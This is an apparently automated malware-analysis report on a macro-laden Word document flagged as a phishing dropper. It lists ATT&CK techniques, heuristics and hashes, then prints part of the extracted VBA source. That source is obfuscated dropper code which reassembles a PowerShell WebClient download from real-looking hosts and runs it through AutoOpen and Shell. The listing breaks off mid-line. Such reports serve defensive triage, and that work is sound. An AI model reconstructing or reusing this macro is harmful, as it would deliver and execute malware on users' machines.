Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is an OLE file containing VBA macros, including an AutoOpen macro and a Shell() call, which together indicate malicious intent. The VBA script attempts to download a second-stage payload from a URL that it rebuilds from Mid()-sliced string fragments; the partially reconstructed URL, which still contains the obfuscation filler tokens (zGb, fUC) that the macro strips at run time, is 'http://charlesduzGb+zGbndafUC+fUCs.co.ukzGb+zGb+/iMpifUC+fUC/9wN.Split(9zGb+zGbwN,9zGfUC+fUC+zGbwzGb+zGbN)zGb+fUC+fUCzGb;2arkarapzGbPzHdmRm'. ClamAV detections further confirm its malicious nature as a dropper and phishing lure.
Heuristics (5)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://b�i�Rgeggd� (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72898 bytes |

SHA-256: a45174214f3e49b18a8a8570bcee59d885debd942eb4f0021edaad047e8b2f68

Detection (ClamAV): Doc.Trojan.Obfuscated-6443078-0

Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "RJuWcKT"
Function CLqzBqiiT()
On Error Resume Next
uqInKAGwz = 44224474 / koaAksVBMYloN - 536083786 + CSng(wCokwICaY) + 2 - Chr(7013) - fXiBqjpBMmTLlr / 8527 * utEOcnKVZrj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(AUNkJPbUNKT)
bSsUhniPh = 44224474 / zfqSMbNwD - 536083786 + CSng(nVwOjwkXIA) + 2 - Chr(7013) - XfFZqaBaSja / 8527 * ALsOnOG + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BYziqpjSkRW)
JdquXIRJ = Mid("2M0G'+'bhtz'+'Gb+zGbtfUC+fU'+'Cp://charlesduzGb+zGbndafUC'+'+fUCs.co.ukzGb+zGb'+'/iMpifUC+fUC/9wN.Split(9zGb'+'+zGbwN,9zGfUC+fUC'+'bfUC+fUC+zGbwzGb+z'+'GbN)zGb+fUC+fUCzGb;2arkarapzGbPzHdmRm", 4, 179)
SThjMr = 44224474 / cjjbazmR - 536083786 + CSng(GBPzMvLUBJJKFp) + 2 - Chr(7013) - zCJwJWRkZtlt / 8527 * jubEPht + Fix(7798) + 9905 * Sin(7) / 310 * Sin(wmzTPzLAK)
qujNziFjS = 44224474 / ETFGzzpbI - 536083786 + CSng(NNCjhZLNBGi) + 2 - Chr(7013) - upmPqLrhqKmI / 8527 * QKmNCLj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(LBuFVVjWI)
YwJzoNKAHW = 44224474 / XtCcYoq - 536083786 + CSng(ZpQpEbCH) + 2 - Chr(7013) - GhEuXvNAPMcu / 8527 * FjPsNAAHWn + Fix(7798) + 9905 * Sin(7) / 310 * Sin(IHECJiVRH)
IRoVEi = Mid("irHzE0KEGGb2zGb+7o", 10, 7)
AsoLFfABlr = 44224474 / AkUYPUjGd - 536083786 + CSng(blCbuhQOZAzv) + 2 - Chr(7013) - WjorKVqHKivlXh / 8527 * vSdvhwlZzTLnE + Fix(7798) + 9905 * Sin(7) / 310 * Sin(zHQFmzpbcZ)
AGhjbJJHkom = 44224474 / CoEdcKl - 536083786 + CSng(WzRRtSfQo) + 2 - Chr(7013) - tJuFlXoRnwXWik / 8527 * GsjPsPTEWKB + Fix(7798) + 9905 * Sin(7) / 310 * Sin(TTZGvroLQJ)
avRkXFJM = 44224474 / nbRDHpWAYTHW - 536083786 + CSng(NAlJpXz) + 2 - Chr(7013) - lmNaifljCUpE / 8527 * uVUVrdpn + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BplMsmMflFa)
UsbSp = Mid("mz0j0hqzGb2zGb+zGb4.com/UoJtK/fUC+fUCwDLVAOp", 8, 30)
wGqIHHdd = 44224474 / CjoKXmszRhnnaw - 536083786 + CSng(vhaFXvk) + 2 - Chr(7013) - VwNscft / 8527 * NwvdjDEwRd + Fix(7798) + 9905 * Sin(7) / 310 * Sin(kpfjwHuv)
mRjLz = 44224474 / FpTncDdHWsRS - 536083786 + CSng(itvJikkWXj) + 2 - Chr(7013) - JOHkrPjtmdjc / 8527 * zFfJfjScsjGzqO + Fix(7798) + 9905 * Sin(7) / 310 * Sin(GdKiJidNwtP)
JZmrS = 44224474 / lKmBSjTL - 536083786 + CSng(tQTXJaqf) + 2 - Chr(7013) - RrdintkzKp / 8527 * OkijnmCKt + Fix(7798) + 9905 * Sin(7) / 310 * Sin(CksmYNqN)
DzljOwjna = Mid("lzGbarfrzGb+zGbanzGb+zfUC'+'+fUCGbczGb+zGb = new-obzGb+zGbject SyfUC+fUCstem.NzGbfUC+fUC+zGbetfUC+fUC.zGb+zGbWebClzGb+zGbiezG'+'b+zGbnt;2azGb+zGbrnzGbfUmMJWci9kU8vfRsi", 2, 151)
mMkUjkDf = 44224474 / LXjtuQAL - 536083786 + CSng(EarrNIQiBkA) + 2 - Chr(7013) - CnJTBTM / 8527 * sjQPYHEMn + Fix(7798) + 9905 * Sin(7) / 310 * Sin(iqCCCCSr)
fVhdMMNa = 44224474 / fBbzIjPiXQ - 536083786 + CSng(niDNJkhP) + 2 - Chr(7013) - djBvJoUZniKBYu / 8527 * rPZjnsB + Fix(7798) + 9905 * Sin(7) / 310 * Sin(qzVawCQwslnt)
aFWLOwHh = 44224474 / aMfuIOGJkWatzn - 536083786 + CSng(kUJcSGDEvpBKz) + 2 - Chr(7013) - kGAJXmGNoIASzU / 8527 * NSlCKRhtqYpWH + Fix(7798) + 9905 * Sin(7) / 310 * Sin(FGEIJzQZjaBl)
kjuJEbIHhmR = Mid("fcj8VzjjjG8UHGj2ziWmRzGb+zGb9wN +'+' 2zGb+zfUC+fUCGbarkazGb+zGbrapazGb+zGbs fUC+fUCzGb+zGb+ 9wN.zGb+zGbexfUC+fUCe9zGb+fUC+fUCzGbwN'+';fozGb+'+'zGbrezGb+zGbaczGb+zGbh(2arabc iz'+'Gb+zGbfUC+fUCn zGb+zG'+'b2dZvbpmaz5KJNCVUr", 19, 186)
jvqTtu = 44224474 / AjqTOqvoGGOnBV - 536083786 + CSng(LBcGcBLwoNYWWk) + 2 - Chr(7013) - PlAFriiMY / 8527 * GtkrGnu + Fix(7798) + 9905 * Sin(7) / 310 * Sin(WmrJhRuphCGp)
fsqsGw = 44224474 / iYHOlZDj - 536083786 + CSng(KwhUWoTfGEa) + 2 - Chr(7013) - oonWzbnZoaM / 8527 * WDIhhPDwPZB + Fix(7798) + 9905 * Sin(7) / 310 * Sin(VlFHSiTQF)
whnZjw = 44224474 / YEoqdmviLc - 536083786 + CSng(DEVIbHhadpAza) + 2 - Chr(7013) - DjLCBjG / 8527 * hhovAcAzBLKD + Fix(7798) + 9905 * Sin(7) / 310 * Sin(cvmNaUf)
qYBASszE = Mid("i1o PQLCzMazGb3zGb+zGb4324zGb+zGb5);2arhuas =zGb+zGb 2arezGb+zfUC+fUCGfUC+fUCbnz'+'Gb+zGbv:pubzGb+zfU'+
```

... (truncated)